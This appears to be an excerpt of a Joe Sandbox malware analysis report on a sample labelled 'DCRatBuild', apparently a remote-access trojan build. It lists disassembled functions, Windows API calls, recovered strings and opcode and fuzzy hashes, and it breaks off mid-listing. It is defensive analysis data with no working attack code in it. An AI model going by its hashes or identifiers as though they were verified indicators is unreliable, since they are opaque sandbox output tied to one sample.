                                      • Instruction ID: 7695b16decaf0ef96704ac99e73644291021e627c7813c0433b4c8dad0988212
                                      • Opcode Fuzzy Hash: 5d341394b37e54c3be0d152c05e610d0f0c97c2b6db2031fe0368800714f6b8c
                                      • Instruction Fuzzy Hash: 0BE046B0A01741EECB20DF389808B42FAE66B18725F04885EE4D6E3280DAF5D580BB61
                                      Function 00F27DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: bee857888f09722f416fa3e834fabf71636909f6ea3ae5c6c393edbe5658b28a
                                      • Instruction ID: 73d1dea748fb1838f3d9b4a7231eb9d121f4c6e0a31776f9e8f178f4a9491510
                                      • Opcode Fuzzy Hash: bee857888f09722f416fa3e834fabf71636909f6ea3ae5c6c393edbe5658b28a
                                      • Instruction Fuzzy Hash: 6D41D432E007149FCB10EF78D881A5EB7F6EF85724F1645A8E915EB281DB31AD01EB80
                                      Function 00F2B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F2B619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2B63C
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F2B662
                                      • _free.LIBCMT ref: 00F2B675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2B684
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 993362e6d26ecec9a50b5c10a48c876b1c65ea6f6770a84c602638e097c3c886
                                      • Instruction ID: 8fa081c62df4b5005bf40af96a2261ef9afb31ac23755ba525f8eb7ee2710221
                                      • Opcode Fuzzy Hash: 993362e6d26ecec9a50b5c10a48c876b1c65ea6f6770a84c602638e097c3c886
                                      • Instruction Fuzzy Hash: 3901B162A02225BF632166B67C99C7B7F6DDAC6BB13140268BD04C2110DF65CD01B1B1
                                      Function 00F29029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00F40EE8,00000200,00F2895F,00F258FE,?,?,?,?,00F0D25E,?,02FC34C0,00000063,00000004,00F0CFE0,?), ref: 00F2902E
                                      • _free.LIBCMT ref: 00F29063
                                      • _free.LIBCMT ref: 00F2908A
                                      • SetLastError.KERNEL32(00000000,00F33958,00000050,00F40EE8), ref: 00F29097
                                      • SetLastError.KERNEL32(00000000,00F33958,00000050,00F40EE8), ref: 00F290A0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 82a0583e40207970045093df2a35014200ebc0334a7f18b18f1af63546b1f664
                                      • Instruction ID: 1dc11b56f8fe71928cb2d41e33070d46af5e8b461aa51997b932f76dad1e3e55
                                      • Opcode Fuzzy Hash: 82a0583e40207970045093df2a35014200ebc0334a7f18b18f1af63546b1f664
                                      • Instruction Fuzzy Hash: 9601F9B2A09A386BD322E7757C85A2B3A1E9FC07B5B250024F51593192DFA88C027151
                                      Function 00F1075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F10A41: ResetEvent.KERNEL32(?), ref: 00F10A53
                                        • Part of subcall function 00F10A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F10A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F1078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00F107A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00F107C2
                                      • CloseHandle.KERNEL32(?), ref: 00F107CE
                                      • CloseHandle.KERNEL32(?), ref: 00F107DA
                                        • Part of subcall function 00F1084E: WaitForSingleObject.KERNEL32(?,000000FF,00F10A78,?), ref: 00F10854
                                        • Part of subcall function 00F1084E: GetLastError.KERNEL32(?), ref: 00F10860
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: 024b5ffd1d2d027df74e54e3d783d8936b15daf0730c61ed1fcf652fc9339621
                                      • Instruction ID: f8dd606217f482bfe9e9efc0a93d9427661ba9ebd09090af86cf8424ab258556
                                      • Opcode Fuzzy Hash: 024b5ffd1d2d027df74e54e3d783d8936b15daf0730c61ed1fcf652fc9339621
                                      • Instruction Fuzzy Hash: 7D01B971544708EFC731DB65DD84FC6BBEAFB44721F000519F15A821A0CBB97684EB50
                                      Function 00F2BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00F2BF28
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2BF3A
                                      • _free.LIBCMT ref: 00F2BF4C
                                      • _free.LIBCMT ref: 00F2BF5E
                                      • _free.LIBCMT ref: 00F2BF70
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7700ba42c5b90711278c93b080af92b175acaa72084dc153857b8f6803c7f9ee
                                      • Instruction ID: 986d9936171437755ebe894c077d6abeeae14bb62b693224ead798e1733318f4
                                      • Opcode Fuzzy Hash: 7700ba42c5b90711278c93b080af92b175acaa72084dc153857b8f6803c7f9ee
                                      • Instruction Fuzzy Hash: A6F01232909225A7C620EBE4FF86C1673EABE007707644845F849D7D90CB34FC81BA54
                                      Function 00F28060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00F2807E
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F28090
                                      • _free.LIBCMT ref: 00F280A3
                                      • _free.LIBCMT ref: 00F280B4
                                      • _free.LIBCMT ref: 00F280C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 2a278bba00a65008b0c35f3d8ad49c4400d39ceef1b561b6cfb76d879ae464c5
                                      • Instruction ID: 4768b16a7329f49ca7b91a02c1b1e9e4684158013a746b6f51761ef6230ea15d
                                      • Opcode Fuzzy Hash: 2a278bba00a65008b0c35f3d8ad49c4400d39ceef1b561b6cfb76d879ae464c5
                                      • Instruction Fuzzy Hash: 0CF0177880212D8BC751BB55FC114053A65BB1476030C465AF42296AB1CF760856BFC1
                                      Function 00F07574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07579
                                        • Part of subcall function 00F03B3D: __EH_prolog.LIBCMT ref: 00F03B42
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F07640
                                        • Part of subcall function 00F07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07C04
                                        • Part of subcall function 00F07BF5: GetLastError.KERNEL32 ref: 00F07C4A
                                        • Part of subcall function 00F07BF5: CloseHandle.KERNEL32(?), ref: 00F07C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 648f23c1ebde7225d9e258c6e32653aff1bbe5c3ee8c790c3e03dc5b79d883c3
                                      • Instruction ID: fa44d2e332c0a90399feaa0d0c41ceaa4f88d6e9ba11b93d9923b4e3297f946a
                                      • Opcode Fuzzy Hash: 648f23c1ebde7225d9e258c6e32653aff1bbe5c3ee8c790c3e03dc5b79d883c3
                                      • Instruction Fuzzy Hash: A031B071E08348AEDF20EB649C01BEE7B79AF55324F044099F845A7182DBB95A44FB61
                                      Function 00F1A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1A4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F1A4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1A4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: 79ac12ba20b18c276a2390038c2b6901d2d44c2ed5140bbeb5676dc261c1be61
                                      • Instruction ID: cd681cedf071ec7cbbf6e7b835ef0e78fb559628cae14fa702917f003eee08c7
                                      • Opcode Fuzzy Hash: 79ac12ba20b18c276a2390038c2b6901d2d44c2ed5140bbeb5676dc261c1be61
                                      • Instruction Fuzzy Hash: 1911E232646214BFE621CFA8DD0DFAA37A9EB4B310F140004F2419B0B0CBE69841F723
                                      Function 00F0D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 97fbc1480e8d1aa52fde7454b3d3a588cecaf282416a96dce3bf02a1d47e3283
                                      • Instruction ID: 65087acb8da5c5b49fda578c37941f0db4d81087dfb87003a4313e56969bb4bd
                                      • Opcode Fuzzy Hash: 97fbc1480e8d1aa52fde7454b3d3a588cecaf282416a96dce3bf02a1d47e3283
                                      • Instruction Fuzzy Hash: 0A215E7294020CEAEB20DEE4CD46FEE7BA8AF04710F040512FA15961E2E775DA59FB61
                                      Function 00F1A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1A9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F1A9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F1AA24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      • Opcode ID: 8b426c25f3e49b10f9add448caf14d3702917839089aa805ef0a672a17bce38a
                                      • Instruction ID: 4c339901ec51ba699ae7a46edd37742518b8e459144290f18ac390c65807ad8b
                                      • Opcode Fuzzy Hash: 8b426c25f3e49b10f9add448caf14d3702917839089aa805ef0a672a17bce38a
                                      • Instruction Fuzzy Hash: 2B110433941118BADB219A649D49FFA7B6CEF4A721F000026FA45B30D0C2A999D5F6A2
                                      Function 00F0B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00F0B51E
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • _wcschr.LIBVCRUNTIME ref: 00F0B53C
                                      • _wcschr.LIBVCRUNTIME ref: 00F0B54C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 2de05f996d6ab750cfad47015ec2b4715780ecd9dbd47c0d31cfd036d638909c
                                      • Instruction ID: 3b4e786430a58bd0e84901f71239f2167eb8c9b8bd6d42eaa2561d4a9d331fd4
                                      • Opcode Fuzzy Hash: 2de05f996d6ab750cfad47015ec2b4715780ecd9dbd47c0d31cfd036d638909c
                                      • Instruction Fuzzy Hash: 7001F953904311BACB30AB75AC43D7BB7ACEE95370B584456F945C60C5FB38D950F2A1
                                      Function 00F106BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F106F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F106FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F0ABC5,00000008,?,00000000,?,00F0CB88,?,00000000), ref: 00F1070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00F10725
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 092c9bb5b6786cb8032c94f28100201bbc6eda032e9d887aedfd1ed84415d9b1
                                      • Instruction ID: c9fc471a0b70070d2a1bbf9c43a6d3b37bec1d5f22b694fd392ae16ee1801088
                                      • Opcode Fuzzy Hash: 092c9bb5b6786cb8032c94f28100201bbc6eda032e9d887aedfd1ed84415d9b1
                                      • Instruction Fuzzy Hash: C311A0B1900709AFC3215F65CC84AA7FBECEB94765F10482EF1DA82240DAB169C0EB60
                                      Function 00F1D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 26ab1fd1e6720a4b678e68d5f1bd699d78d9faa95b6118ba48cd7046dcd500de
                                      • Instruction ID: 8fd6170d0eb2b4eba5b5d88e73c0eb098968a9b4910d43ee39913c6da5be1bab
                                      • Opcode Fuzzy Hash: 26ab1fd1e6720a4b678e68d5f1bd699d78d9faa95b6118ba48cd7046dcd500de
                                      • Instruction Fuzzy Hash: 9301B57590024DAFDB11CF14ED04A9A3BA9E7163A1F040421F905D3230C671AC90FBA1
                                      Function 00F291DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction ID: 71b8445bca380cb362a33a8e27aabad5b96f5863839e42bddf85d33046003ce7
                                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction Fuzzy Hash: D8A18C32D083669FDB11DF58E8917AEBBE5EF51320F14416DE4859B2C1C2B89C42E750
                                      Function 00F0A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00F080B7,?,?,?), ref: 00F0A351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00F080B7,?,?), ref: 00F0A395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?), ref: 00F0A416
